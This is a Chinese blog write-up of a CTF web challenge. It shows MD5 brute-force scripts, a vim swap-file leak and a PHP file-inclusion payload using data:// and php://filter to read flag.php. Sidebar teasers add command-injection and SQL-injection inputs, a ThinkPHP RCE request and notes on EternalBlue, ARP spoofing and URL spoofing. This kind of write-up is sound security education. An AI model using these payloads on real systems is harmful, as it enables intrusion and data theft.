Doc

最新推荐文章于 2022-12-14 09:52:08 发布
最新推荐文章于 2022-12-14 09:52:08 发布
阅读量73 收藏 1
点赞数
分类专栏: 安全 CTF WEB安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/satasun/article/details/108870318
版权
安全 同时被 3 个专栏收录
49 篇文章 6 订阅
订阅专栏
CTF
40 篇文章 1 订阅
订阅专栏
WEB安全
38 篇文章 0 订阅
订阅专栏

解题过程如下

首先写脚本

爆破出md5,建议采用python或者php

#coding:utf-8
#python3
import hashlib
import time

t = time.time()
l = 'qwertyuiopasdfghjklzxcvbnm'
for i in l:
    for j in l:
        for k in l:
            for m in l:
                for n in l:
                    for o in l:
                        f = 'y' + i + j + k + m + n + o #+ p
                        md5 =  hashlib.md5(f.encode(encoding='UTF-8')).hexdigest()
                        if md5[:4] == '9d92' and md5[-4:] == 'b24e':
                            print(f)
                            print(md5)
                            print(time.time()-t)

<?php
$l = 'qwertyuiopasdfghjklzxcvbnm';
for ($i = 0 ; $i < 26 ; $i + = 1){
	for ($j = 0 ; $j < 26 ; $j + = 1){
		for ($k = 0 ; $k < 26 ; $k + = 1){
			for ($m = 0 ; $m < 26 ; $m + = 1){
				for ($n = 0 ; $n < 26 ; $n + = 1){
					for ( $o = 0 ; $o < 26 ; $o + = 1){
						$str = 'y'.$l[$i].$l[$j].$l[$k].$l[$m].$l[$n].$l[$o];
						$md5 = md5($str);
						if (substr($md5 , 0 , 4)==='9d92'){
							if (substr($md5 , -4) === 'b24e'){
								echo $md5.PHP_EOL;
								echo $str.PHP_EOL;
							}
						}
					}
				}
			}
		}
	}
}
echo "End~";
?>

爆出来的结果都是9d9208a0bda5b582cc5baffd5bf6b24e,明文是ytxyyds.

然后是扫描

在这里插入图片描述
用扫描器扫描一下,发现了一个flag.php

然后看到了这个
在这里插入图片描述

如果你的字典足够强大,应该能扫描到Login.php.swp,考点是vim文件泄露,或者是文件备份
好像火狐和谷歌展现出来的不太一样:
在这里插入图片描述
在这里插入图片描述

代码审计

接下来就是代码审计。简单还是很简单的,主要就是文件包含漏洞,绕过前两个检测就行,具体分析如下:

<?php
error_reporting(0);
echo "Flag in flag.php";
$text = $_GET["text"];             //接受text传参
$file = $_GET["file"];                //接受file传参
if(isset($text)&&!preg_match("/php:\/\/input/i",$text)&&(file_get_contents($text,'r')==="YTXyyds")){         //text中不允许出现"php://",读取text的文件的内容要为YTXyyds
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    include($file);       //在这里进行文件包含 
}

?>

想要让file_get_contents($text,'r')的内容变为YTXyyds可以采用两种PHP伪协议,一种是php://input,另一种是data://text,由于这里过滤了php://input,所以采用

?text=data://text/plain,YTXyyds

file的话就很简单了,只是普通的文件读取,用php://filter/read=convert.base64-encode/resource=就行。总结出payload:

?text=data://text/plain,YTXyyds&file=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述
在这里插入图片描述
考核的时候动态flag看不到这个flag,以此纪念 /手动示爱 23333333

imbia
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
工具 docdocx 工具 docdocx 备份备份
02-22
备份
Spire.Doc
北辰
06-15 2689
Free Spire.Doc for Java是一款免费、专业的 Java Word 组件,开发人员使用它可以轻松地将 Word 文档创建、读取、编辑、转换和打印等功能集成到自己的 Java 应用程序中。作为一款完全独立的组件,Free Spire.Doc for Java的运行环境无需安装 Microsoft Office。
让RenderDoc批量导出纹理
专栏
10-04 3415
RenderDoc导出纹理时只能一张张导出,非常麻烦,改一下RenderDoc,效果如下 一、qrenderdoc\Windows\TextureViewer.ui中追加2个按钮 <item> <widget class="QToolButton" name="saveTex"> <property name="toolTip"> <string>Save selected Texture</string&g
Spire.Doc for Java 10.12.2 新版
控件与插件之大全
12-14 1862
Spire.Doc for Java是一个专业的 Word API,它使 Java 应用程序能够在不依赖 Microsoft Word 的情况下创建、转换、操作和打印 Word文档。 通过使用这个多功能库,开发人员能够毫不费力地处理大量任务,例如插入图像、超链接、 数字签名、书签和水印、设置页眉和页脚、创建表格、设置背景图像以及添加脚注和尾注。
PHPDoc 规范
烟雨弥漫了江南的博客
04-22 6235
转载自 PHP 注释的艺术 —— phpDoc 规范 PHPDOC PHPDoc 是一个 PHP 版的 Javadoc。它是一种注释 PHP 代码的正式标准。它支持通过类似 phpDocumentor 这样的外部文档生成器生成 API 文档,也可以帮助一些例如 Zend Studio, NetBeans, ActiveState Komodo Edit and IDE 和 Aptana Stu...
轻松搞定——JAVA实现DOC转PDF功能
yzlittlelovely的博客
08-01 6478
Word作为目前主流的文本编辑软件之一,功能十分强大,应用人群广,但是它也存在一些问题。像是Word文件在不同软件或操作平台之间传输的时候,时不时会出现各种格式的“变化”,也会有点“不稳定”,例如内容和格式经常容易篡动。 相较于Word,pdf格式文件显然优秀不少。虽然在内容编辑和修改方面表现不佳,但pdf格式文件在不同平台和软件上的稳定性表现着实出色。日常办公中,越来越多的会选择将编辑好的Word文件转换成Pdf格式文件,然后再分享给第三方浏览。 如果只是1个Word文件转换成Pdf文件,简直so eas
2022 Spire.Doc 4.8 Spire.Pdf 6.8
07-19
Spire.Doc.dll(版本6.8.16.4040);Spire.Pdf(版本4.8.15.2040) 使用时引用将四个文件都引用到项目。 **亲测Word完全可用 VS2015+FrameWork4.6.2**** if (openFileDialog.ShowDialog() == true) { ShowOperInfo(...
Spire.Doc生成docx的第三方包
12-01
使用spire可相当方便简单的生成Doc,表格、字体样式、字体颜色、字体格式大小等等,几行代码搞定,相关使用可以看我的文章
spire.doc-5.4.0.jar
05-31
可以添加本地依赖通过命令mvn install:install-file -Dfile=C:\Users\spire.doc-5.4.0.jar -DgroupId=e-iceblue -DartifactId=spire.doc -Dversion=5.4.0 -Dpackaging=jar将该依赖添加到本地依赖库使用,其他添加到...
spire.doc-5.4.2.jar
04-18
可以添加本地依赖通过命令mvn install:install-file -Dfile=C:\Users\spire.doc-5.4.2.jar -DgroupId=e-iceblue -DartifactId=spire.doc -Dversion=5.4.2 -Dpackaging=jar将该依赖添加到本地依赖库使用,其他添加到...
[极客大挑战 2019]LoveSQL 1
satasun的博客
05-20 9166
一个比较简单的SQL注入题目,写一下做个笔记。 看到登录直接盲猜账号密码admin和password,然后在账号处进行注入,结果还给我试对了。看了一下网上大佬们的做法,发现我就是捡了个漏,正确做法其实是利用万能密码登录,登录后进行注入。接下来把正规做法记录一下: 万能密码如下: 这里账号填1' or 1=1#,密码随便写。 登陆成功,看了一下url,是以get方式进行传参。先在username处测试一下有没有注入点: ?username=1' order by 1%23&password=ads
[GXYCTF2019]Ping Ping Ping
satasun的博客
05-21 5816
打开链接,页面提示/?ip= 猜测本题的意思是让我们把这个当做变量上传参数。 先输入127.0.0.1 看来把我们上传的东西当做ip来执行ping操作。 试试看能不能利用一下管道: ?ip=127.0.0.1;dir 诶,不行,dir是windows下的,说不定服务器是linux的 ?ip=127.0.0.1;ls 出现了flag.php,那么简单的? cat flag.php走起 ?ip=127.0.0.1;cat flag.php 嗯?过滤空格? 过滤空格的解决办法如下 $IFS ${IFS} $I
利用python脚本实现一招断网
satasun的博客
04-16 3892
看标题可能比较高大上,但是实际上需要一个前提条件:处在同一个内网环境下,通俗的意义上讲可以是在同一个WiFi下,但是内网的含义不止如此,想要了解的可以自行百度,这里不作补充 首先介绍一下原理 这里我们需要介绍一下ARP协议以及ARP攻击的实现方式 ARP(Address Resolution Protocol)地址解析协议,目的是实现IP地址到MAC地址的转换。 计算机在进行通信的时候,唯一标识...
[ThinkPHP]5.0.23-Rce 漏洞复现
satasun的博客
12-07 3865
[ThinkPHP]5.0.23-Rce 环境搭建 github传送门 BUU传送门 POC 老懒狗选择直接buu,链接 http://node3.buuoj.cn:27512/ 直接用poc打一下: POST /index.php?s=captcha HTTP/1.1 Host: node3.buuoj.cn:27512 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (com
永恒之蓝(ms17-010)漏洞复现,进行简单后渗透信息收集
satasun的博客
05-08 3660
申明 本文章仅供学习使用 环境准备: win7虚拟机(靶机) ip:192.168.56.134 kali虚拟机(攻击机) ip:172.18.20.164 要求:win7虚拟机不要开防火墙,开放445端口,没有打永恒之蓝的补丁 实验开始: 先用nmap扫描一下靶机开了哪几个端口: nmap -Sv -p 1-1000 192.168.56.134 跑了两分钟,发现win7着实开了445端口。接下来直接打开msfconsole来进行攻击。 打开msfconsole会随机跳出图案,每一次打开都不一样
域名伪装
satasun的博客
11-01 3564
参考链接 这里利用了一个不算漏洞的漏洞: 浏览器在解析URL的时候默认丢掉@前面的所有东西。 比如https://[email protected]/shenjuxian 不注意看的话会以为是百度的,其实跳转到了另一个网站,如果黑客在后面网站上挂马的话很容易就中招啦。 这里两个网址,看起来花里胡哨的,那如果后面跟一个ip呢: https://[email protected] 看起来就稍微不那么显眼啦 ip中的点还是很难受,那就将它变为纯数字,计算方式如下:
震惊!PC端QQ也能防撤回?
satasun的博客
05-30 3481
首先,打开QQ所在文件的位置: 将所给文件IM.dll文件复制进当前目录,替换掉原来的IM.dll: 重启QQ就可以啦! 文件下载链接如下: https://download.csdn.net/download/satasun/19242892
使用Docker搭建SQL注入靶场
satasun的博客
11-02 2568
Docker搭建SQL注入漏洞 什么是Docker Docker又被叫做容器,使用教程参考我的博客: 传送门 如何搭建靶场 这里以ubuntu上搭建docker为例 首先下载docker: apt install docker.io apt install docker-compose 如何搭建web服务器 一般来说比较推荐Apache,详细教程请查看我的博客 如何写php文件 以一个简单的php文件为例,如果有需要请自行增加功能。 <?php error_reporting(0);
BUUCTF_upload-labs 第一题
satasun的博客
07-30 2469
Pass-01 首先,查看源码,在源码的最低端发现了这个: 这个是js代码,看不懂。但是大概猜出来上传类型必须为.jpg .png .gif三者之一。这个判断是在前端的,比较好绕过。可用方法有好几种: 1.下载火狐的插件,禁用前端js。(这个用处不是很多,不做介绍) 2.使用BP抓包,修改文件名。 3.将文件名命名为xxx.php.jpg类型绕过。 先上传一张正常图片试试: 上传成功,并且可以复制图片地址。 复制图片地址后,在浏览器打开: 这个就是我上传的图片。证明我们上传的图片名字没变,而且存放地
syteline doc
最新发布
11-25
Syteline是一个用于管理企业资源计划(ERP)的软件平台,Syteline Doc是Syteline软件中的文档模块。该模块可以帮助用户管理和存档公司的各种文档,包括合同、报价单、设计规格、质量保证文件等等。Syteline Doc可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值